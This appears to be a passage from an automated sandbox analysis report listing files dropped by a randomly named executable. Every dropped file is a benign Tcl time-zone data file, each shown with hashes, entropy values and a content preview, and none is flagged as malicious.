                                                                                                                                                                                                                              Size (bytes):9709
                                                                                                                                                                                                                              Entropy (8bit):3.80455694200614
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:hZUiLbMsf/ss0qKd+aKyUXtOZHY1SCOcesoQivoKbFVCdm1rXWNXyCXTOuUbkIaq:hZZDQX1rWJysukysLE3+sSGjT
                                                                                                                                                                                                                              MD5:AC6647F9B53B5958214EC3F3B78A4D85
                                                                                                                                                                                                                              SHA1:7355622AF99296F069F73899D5C70941C207F676
                                                                                                                                                                                                                              SHA-256:B2A0D0DDC26806A05B2BE806CA3F938DB12A3FA40110B8B21FD3F04EFED3A531
                                                                                                                                                                                                                              SHA-512:07569CA4D5DC6D57D91D6FDC370671A7546B73BA653D094E1B501D33570F7700727AD7FF2A083BC79E9EDE807C47E7A5604BEF5803F290B2F277C51DEF10FA6B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Madeira) {.. {-9223372036854775808 -4056 0 LMT}.. {-2713906344 -4056 0 FMT}.. {-1830380400 -3600 0 -01}.. {-1689552000 0 1 +00}.. {-1677798000 -3600 0 -01}.. {-1667433600 0 1 +00}.. {-1647734400 -3600 0 -01}.. {-1635811200 0 1 +00}.. {-1616198400 -3600 0 -01}.. {-1604361600 0 1 +00}.. {-1584662400 -3600 0 -01}.. {-1572739200 0 1 +00}.. {-1553040000 -3600 0 -01}.. {-1541203200 0 1 +00}.. {-1521504000 -3600 0 -01}.. {-1442448000 0 1 +00}.. {-1426809600 -3600 0 -01}.. {-1379289600 0 1 +00}.. {-1364774400 -3600 0 -01}.. {-1348444800 0 1 +00}.. {-1333324800 -3600 0 -01}.. {-1316390400 0 1 +00}.. {-1301270400 -3600 0 -01}.. {-1284336000 0 1 +00}.. {-1269820800 -3600 0 -01}.. {-1221436800 0 1 +00}.. {-1206921600 -3600 0 -01}.. {-1191196800 0 1 +00}.. {-1175472000 -3600 0 -01}.. {-1127692800 0 1 +00}.. {-1111968000 -3600 0 -01}.. {-
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.910514445868106
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2RQqGsA/8rVDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2RQjQD4
                                                                                                                                                                                                                              MD5:ECB480DA99D29C0ACE67426D45534754
                                                                                                                                                                                                                              SHA1:784CF126B030C3D883EE541877E6181F795C9697
                                                                                                                                                                                                                              SHA-256:BDA015714260001BAE2848991DD21E802580BE2915797E5DABC376135D1C5246
                                                                                                                                                                                                                              SHA-512:54C1B20E45C7C73354DCD4E0F4444720771820ED10B282F745DC391BEADEAEDC629BEF97B1908FB62CDAEC915D32AF1F54FC6AA9DC83E317E7CE19FC2586EF28
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Atlantic/Reykjavik) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):160
                                                                                                                                                                                                                              Entropy (8bit):5.011466665416709
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2RQqGtlN62/EiMXGm2OHXT14YoHvhFvdQVIyV:SlSWB9eg/2RQrlo2MiDm2OHXqYoHvTFS
                                                                                                                                                                                                                              MD5:3B310BB8C90CA716DC1AC5A697ACA9CD
                                                                                                                                                                                                                              SHA1:CD583F49478DCDAD91EF78539502C6FC62945C1E
                                                                                                                                                                                                                              SHA-256:51BFABCB3388107753A3C1A8CF31118E6627132BAA09B9878D9E7CEDBEBB4886
                                                                                                                                                                                                                              SHA-512:F593B7A1FAF0EA6B42D5EE86C20C9A8F5CD7ACD9B30EF7755E45ECAFEA8752C32E4CF4BEDF531F494E59D9F0C49CCC6FCA077292E20794AA265DFC0A56DFE579
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/South_Georgia) {.. {-9223372036854775808 -8768 0 LMT}.. {-2524512832 -7200 0 -02}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.880390141563645
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2RQqGt4r+DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2RQr4rV
                                                                                                                                                                                                                              MD5:2C73A963F515376A46762CE153AAF5C5
                                                                                                                                                                                                                              SHA1:996C3C93DFAD89EA80AC5DFA1DFBD7CECD9ED28D
                                                                                                                                                                                                                              SHA-256:1C9CA8966FC8BD0BE70F4A187E17E56FB99139BC88C392E82BA2E23E23111C54
                                                                                                                                                                                                                              SHA-512:35A9ADC047DB058D71C21FC4ECB57CD14B0D9BA4416506763D1800D72CE6C9E81636F332AAD3533616F05C86F90A60416BD4065C5F832A51AA3DC186218BDCAE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Atlantic/St_Helena) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2256
                                                                                                                                                                                                                              Entropy (8bit):3.662522763865322
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:506KSBSdSs2SbSwGSyPU3lSsS5SGScSo/SkSuShSceS3SBSc7XSiSgSwSd/SJkS6:JKU+Ew0FU1TuhrR//tOIoOjXZfDWSkPR
                                                                                                                                                                                                                              MD5:77C7ECE4FCBE150069B611C75E8DAA0E
                                                                                                                                                                                                                              SHA1:22F4E5F15BCA92D8456B70BB36230F2605CA5E1C
                                                                                                                                                                                                                              SHA-256:F0E99EF01F140CD5AAFE16803A657922207E6F7F6AF10B0AE795790916C302C4
                                                                                                                                                                                                                              SHA-512:6FB57E8499A587292AFAFA9BD003721572393D5268CAF956230DA76983A112B27D6731BE561A22CCEF84935F43AC988B667C2DC404C157EA8D0E7830FC1A2AB8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Stanley) {.. {-9223372036854775808 -13884 0 LMT}.. {-2524507716 -13884 0 SMT}.. {-1824235716 -14400 0 -04}.. {-1018209600 -10800 1 -04}.. {-1003093200 -14400 0 -04}.. {-986760000 -10800 1 -04}.. {-971643600 -14400 0 -04}.. {-954705600 -10800 1 -04}.. {-939589200 -14400 0 -04}.. {-923256000 -10800 1 -04}.. {-908139600 -14400 0 -04}.. {-891806400 -10800 1 -04}.. {-876690000 -14400 0 -04}.. {-860356800 -10800 1 -04}.. {420606000 -7200 0 -03}.. {433303200 -7200 1 -03}.. {452052000 -10800 0 -03}.. {464151600 -7200 1 -03}.. {483501600 -10800 0 -03}.. {495597600 -14400 0 -04}.. {495604800 -10800 1 -04}.. {514350000 -14400 0 -04}.. {527054400 -10800 1 -04}.. {545799600 -14400 0 -04}.. {558504000 -10800 1 -04}.. {577249200 -14400 0 -04}.. {589953600 -10800 1 -04}.. {608698800 -14400 0 -04}.. {621403200 -10800 1 -04}.. {640753200 -14400 0 -
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.862270414049974
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjLkXHAIgoXjLyFvHRL/2QWCCjpMFBx/h4QWCCj1:SlSWB9vsM3yI9kHAIgmON/2DCeMFB/4d
                                                                                                                                                                                                                              MD5:2EF41863430897F45E0CBB51E6A44069
                                                                                                                                                                                                                              SHA1:8E9561060E9509FAF235E5E033FC9C2918E438DB
                                                                                                                                                                                                                              SHA-256:DF7CBDDCBB2F5926A07D19A35739E5B8DCD9733C037F7D1FF95753C28D574674
                                                                                                                                                                                                                              SHA-512:9D3A37D64DCCCA28093C30FAB595690D021FACEC15F351A77CA33A779D645D305A2FA031869F0DE3B0404C498C2C321D3D02E4DC592D3C632F6700F5DCB54900
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Sydney)]} {.. LoadTimeZoneFile Australia/Sydney..}..set TZData(:Australia/ACT) $TZData(:Australia/Sydney)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                                              Entropy (8bit):3.894755849491153
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:j8SY62BXovlCyRL8pJXa4NyPaNw0leasxMQ/UvuQPxBFNsLQ2nDs020DdDncIsea:j8X3Xzgl3PaN8asiQ/Uv9UnvtCaRs
                                                                                                                                                                                                                              MD5:94E1A0C4326D09AF103107E64625CC6C
                                                                                                                                                                                                                              SHA1:C026565F020EB158309549D98313632BAA79205F
                                                                                                                                                                                                                              SHA-256:5C43D3152982BCFD5B9F51D0E909CF3A558BED1C270FEFFE030531D38D6F91B7
                                                                                                                                                                                                                              SHA-512:CA08A8BC0EB740D59650FE0A9E56D9E169348AD0994F2BFFD6CCFBF9CC42E82F892FB719E80C4E2084B5702E9725C651359EE3066BD71BB19397EA83B6A68430
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Adelaide) {.. {-9223372036854775808 33260 0 LMT}.. {-2364110060 32400 0 ACST}.. {-2230189200 34200 0 ACST}.. {-1672558200 37800 1 ACDT}.. {-1665387000 34200 0 ACST}.. {-883639800 37800 1 ACDT}.. {-876123000 34200 0 ACST}.. {-860398200 37800 1 ACDT}.. {-844673400 34200 0 ACST}.. {-828343800 37800 1 ACDT}.. {-813223800 34200 0 ACST}.. {31501800 34200 0 ACST}.. {57688200 37800 1 ACDT}.. {67969800 34200 0 ACST}.. {89137800 37800 1 ACDT}.. {100024200 34200 0 ACST}.. {120587400 37800 1 ACDT}.. {131473800 34200 0 ACST}.. {152037000 37800 1 ACDT}.. {162923400 34200 0 ACST}.. {183486600 37800 1 ACDT}.. {194977800 34200 0 ACST}.. {215541000 37800 1 ACDT}.. {226427400 34200 0 ACST}.. {246990600 37800 1 ACDT}.. {257877000 34200 0 ACST}.. {278440200 37800 1 ACDT}.. {289326600 34200 0 ACST}.. {309889800 37800 1 ACDT}.. {320776200 34200 0 ACST}
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):674
                                                                                                                                                                                                                              Entropy (8bit):4.32071371733564
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862ELmdHLOYCvSi0xT0ryRIvUr0obZv:5ELe6dvSi6L
                                                                                                                                                                                                                              MD5:900B39F1D4AB93A445F37B6C0A8DE3D9
                                                                                                                                                                                                                              SHA1:DE82800779DCB8094C395B5024BD01FFA3C3BB8C
                                                                                                                                                                                                                              SHA-256:0D3C39EDAB34A8DB31A658A1549772F7D69EB57565E40AA87B707953A2D854A4
                                                                                                                                                                                                                              SHA-512:8D115D1D14FE6FF21A4AE77E3AAC075E6A877214E568956B9A4FD2E75A46E458CAA5AE26B483F128B4C62960D73BD7543BC32F22B760059423B3D9ABCBA24B6A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Brisbane) {.. {-9223372036854775808 36728 0 LMT}.. {-2366791928 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {625593600 39600 1 AEDT}.. {636480000 36000 0 AEST}.. {657043200 39600 1 AEDT}.. {667929600 36000 0 AEST}.. {688492800 39600 1 AEDT}.. {699379200 36000 0 AEST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8437
                                                                                                                                                                                                                              Entropy (8bit):3.902306256303896
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:QZSSY62BXovldRL8q75aANyPaNw0leasxMQ/UvuQPxBFNsLQ2nDs020DdDncIsea:QZSX3X2QfPaN8asiQ/Uv9UnvtCaRs
                                                                                                                                                                                                                              MD5:1553DAAB804A6C9BB15D711554980D3B
                                                                                                                                                                                                                              SHA1:5E3161B1FBB4C246DCB5E11ABD94095121CE38ED
                                                                                                                                                                                                                              SHA-256:734F295BD0B558BDF6178DE62151B8913699D08AB2B1D101C55B8DEBC410074C
                                                                                                                                                                                                                              SHA-512:06B21886070E39E390ECBD18841B7FDBFCA2C7C8573495D2BAA2B92EB113CD1C73C18D73C49DE3C49572CBCBCBED2FAD3248BC651BEB825A1E089B1DEDEFCBFA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Broken_Hill) {.. {-9223372036854775808 33948 0 LMT}.. {-2364110748 36000 0 AEST}.. {-2314951200 32400 0 ACST}.. {-2230189200 34200 0 ACST}.. {-1672558200 37800 1 ACDT}.. {-1665387000 34200 0 ACST}.. {-883639800 37800 1 ACDT}.. {-876123000 34200 0 ACST}.. {-860398200 37800 1 ACDT}.. {-844673400 34200 0 ACST}.. {-828343800 37800 1 ACDT}.. {-813223800 34200 0 ACST}.. {31501800 34200 0 ACST}.. {57688200 37800 1 ACDT}.. {67969800 34200 0 ACST}.. {89137800 37800 1 ACDT}.. {100024200 34200 0 ACST}.. {120587400 37800 1 ACDT}.. {131473800 34200 0 ACST}.. {152037000 37800 1 ACDT}.. {162923400 34200 0 ACST}.. {183486600 37800 1 ACDT}.. {194977800 34200 0 ACST}.. {215541000 37800 1 ACDT}.. {226427400 34200 0 ACST}.. {246990600 37800 1 ACDT}.. {257877000 34200 0 ACST}.. {278440200 37800 1 ACDT}.. {289326600 34200 0 ACST}.. {309889800 37800 1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):195
                                                                                                                                                                                                                              Entropy (8bit):4.851279484907769
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjLkXHAIgoXjLyFvHRL/2QWCCjnSV1+QWCCjLBn:SlSWB9vsM3yI9kHAIgmON/2DCcq+DCyB
                                                                                                                                                                                                                              MD5:8944D3DF8FBECC03A8FB18C3B2DA3B53
                                                                                                                                                                                                                              SHA1:6B17B38D6560592CA49840C47DB9BDA7E79F9F76
                                                                                                                                                                                                                              SHA-256:5FE3CED97293FE0573D5ECE0CEF59CE5DDB4C57BC568AE7199E77B01D3ADE17C
                                                                                                                                                                                                                              SHA-512:907D8BB7EA840E0B3AC683884F2F709A2C06D67CE9258BE46400A0DA63581A9B1403A44FA43E1059BE8F5C7E06F9FA05C176309AD6295317BF14F0E9FA5741E4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Sydney)]} {.. LoadTimeZoneFile Australia/Sydney..}..set TZData(:Australia/Canberra) $TZData(:Australia/Sydney)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):193
                                                                                                                                                                                                                              Entropy (8bit):4.79231670095588
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yI4DVJHAIgxnvVWAN/2DCkx+4DCVDy:MByMjUQVv8At2s4Ky
                                                                                                                                                                                                                              MD5:0C1DFC0877CE8EB08007B7C2B7AF2D87
                                                                                                                                                                                                                              SHA1:02F835BE2DA4FCA79DC2A6959BB4EB6ACC8DF708
                                                                                                                                                                                                                              SHA-256:1DD4EC4ED4F854E2EF6162B2F28C89208710F8EC5AABB95FFA9425D3FBBCAB13
                                                                                                                                                                                                                              SHA-512:358347045915B7D10940DB15E49528D0C636BEC1BE70129847D0B9D034F9E96E847394D88358E87D98A9E581605A3C2AB917B85FDE1296F290B4194BB7E3FA46
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Hobart)]} {.. LoadTimeZoneFile Australia/Hobart..}..set TZData(:Australia/Currie) $TZData(:Australia/Hobart)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):437
                                                                                                                                                                                                                              Entropy (8bit):4.508468081487136
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862pmdHPCvZUjMWpXgda/gd026Xgdvgd+v:5peKvZqMSX+4+56X+v+Q
                                                                                                                                                                                                                              MD5:A81864B2C0BD7BF81F4FA21F17800059
                                                                                                                                                                                                                              SHA1:518AC9E040A17083ED3962F4FBB47D1D83764FF7
                                                                                                                                                                                                                              SHA-256:AC004FD4B3C536406991EC13EBB3E64E0EC0C7B264BC18C0700C8FA545868155
                                                                                                                                                                                                                              SHA-512:3C24F4C2CC3072B3E820FCC1C68A747DCCBB9481FE743C1555783CC932DCBA44FE4851A732D24EABF62E845474D4E1278F120A04DB7549A18C7C49C31FB8D425
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Darwin) {.. {-9223372036854775808 31400 0 LMT}.. {-2364108200 32400 0 ACST}.. {-2230189200 34200 0 ACST}.. {-1672558200 37800 1 ACDT}.. {-1665387000 34200 0 ACST}.. {-883639800 37800 1 ACDT}.. {-876123000 34200 0 ACST}.. {-860398200 37800 1 ACDT}.. {-844673400 34200 0 ACST}.. {-828343800 37800 1 ACDT}.. {-813223800 34200 0 ACST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):759
                                                                                                                                                                                                                              Entropy (8bit):4.110997549215461
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862EmdHvOYCvV2mV22wF2nUV2CF2+V2pCwF21UF2biV2cHVKF25V2VF2cV2tFq:5Eemdvg2wQCKZ4j5c0LVmtH1iknohwQT
                                                                                                                                                                                                                              MD5:1BC8DBD2E24606EFA49F933034FC0EEF
                                                                                                                                                                                                                              SHA1:A511695A1B87A689C6BFF65257C11D3962FDDA3D
                                                                                                                                                                                                                              SHA-256:79D0C770A304360DB33F3D1EF7B3935F1E4E8125893E0DCE683AC35A51302CFB
                                                                                                                                                                                                                              SHA-512:A839D390D70F22FC833322029B732F3AE68FF48793B07005041BD12322DD6E5D5E5FF31787AA004A507A57F8FC245133891F266C4EF19D49F085E6B412E5B04C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Eucla) {.. {-9223372036854775808 30928 0 LMT}.. {-2337928528 31500 0 +0945}.. {-1672555500 35100 1 +0945}.. {-1665384300 31500 0 +0945}.. {-883637100 35100 1 +0945}.. {-876120300 31500 0 +0945}.. {-860395500 35100 1 +0945}.. {-844670700 31500 0 +0945}.. {-836473500 35100 0 +0945}.. {152039700 35100 1 +0945}.. {162926100 31500 0 +0945}.. {436295700 35100 1 +0945}.. {447182100 31500 0 +0945}.. {690311700 35100 1 +0945}.. {699383700 31500 0 +0945}.. {1165079700 35100 1 +0945}.. {1174756500 31500 0 +0945}.. {1193505300 35100 1 +0945}.. {1206810900 31500 0 +0945}.. {1224954900 35100 1 +0945}.. {1238260500 31500 0 +0945}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8734
                                                                                                                                                                                                                              Entropy (8bit):3.8515786470328823
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:aOqigkx6WsYyS39nQiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:aOq05hnQiAmcOM6e0pj
                                                                                                                                                                                                                              MD5:5E04BF8E1DEBFCC4130FDD1BBD67B2DF
                                                                                                                                                                                                                              SHA1:796AADCE7BB2FAF5E6FC916C941A4E3DCAFACC9E
                                                                                                                                                                                                                              SHA-256:D813F6A97BEFC22CA4F24C59EB755D269B9C68A449CC7CF0D2C61F911860EBE7
                                                                                                                                                                                                                              SHA-512:3A69CF1D1F57D6BD39E5F4DAF76BBB06A749D42BEB29452A0A5BDAA68F5DACC0DF176EDDA7A083F5B5B84FC651926C09D46CAAD2F6C4F1595AB9CCA1A958D653
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Hobart) {.. {-9223372036854775808 35356 0 LMT}.. {-2345795356 36000 0 AEST}.. {-1680508800 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-1646640000 39600 1 AEDT}.. {-1635753600 36000 0 AEST}.. {-1615190400 39600 1 AEDT}.. {-1604304000 36000 0 AEST}.. {-1583920800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {-94730400 36000 0 AEST}.. {-71136000 39600 1 AEDT}.. {-55411200 36000 0 AEST}.. {-37267200 39600 1 AEDT}.. {-25776000 36000 0 AEST}.. {-5817600 39600 1 AEDT}.. {5673600 36000 0 AEST}.. {25632000 39600 1 AEDT}.. {37728000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AES
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):199
                                                                                                                                                                                                                              Entropy (8bit):4.912882643701746
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yIoGEoPHAIgjGg6N/2DCkx/2DCPGUv:MByMjeXV6t2a8v
                                                                                                                                                                                                                              MD5:425DC7B1E31F4AA41DAD74E3C9AE3562
                                                                                                                                                                                                                              SHA1:D92A3269F7BF5EC00F082C64CEF6E20C43017180
                                                                                                                                                                                                                              SHA-256:4D84E4040FBC529C9E0366BB74D0CFADEEEEDA0DFCC6C2C9204DED6C6455CAC3
                                                                                                                                                                                                                              SHA-512:F3031F16C0D00D9F8A38CD378F599EB3E63F4FF85F120DB38E3013E93F08E6F512D969F164BBC88CD625910FB3E086F3352E5B8FFC1373C3CC98F363FB3FD3F7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Lord_Howe)]} {.. LoadTimeZoneFile Australia/Lord_Howe..}..set TZData(:Australia/LHI) $TZData(:Australia/Lord_Howe)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):824
                                                                                                                                                                                                                              Entropy (8bit):4.249672335529665
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862gtmdHVCvCi0xT0ryRIvUr0obbty/ywtUj3yv:5gteMvCi6Xlt8
                                                                                                                                                                                                                              MD5:504A422280E0459A2126E7CB02F527E6
                                                                                                                                                                                                                              SHA1:EF61B98EFB1E44EE59020E99A69EA67D6B8ACFC2
                                                                                                                                                                                                                              SHA-256:01B278309353849CC2FDF62A30E2FF483833D5713CF5E329252738BE6F2C0A84
                                                                                                                                                                                                                              SHA-512:BFDAAD56D817CD3AAB17DFD0A33EFDD422645BC542ABE269C0F8520E33796DF4F19EAB2E40BFC6C4AF93EF654239B8F2E285639B4662040D865B9C340A23CFAD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Lindeman) {.. {-9223372036854775808 35756 0 LMT}.. {-2366790956 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {625593600 39600 1 AEDT}.. {636480000 36000 0 AEST}.. {657043200 39600 1 AEDT}.. {667929600 36000 0 AEST}.. {688492800 39600 1 AEDT}.. {699379200 36000 0 AEST}.. {709912800 36000 0 AEST}.. {719942400 39600 1 AEDT}.. {731433600 36000 0 AEST}.. {751996800 39600 1 AEDT}.. {762883200 36000 0 AEST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7764
                                                                                                                                                                                                                              Entropy (8bit):3.5615258807990537
                                                                                                                                                                                                                              Encrypted:false
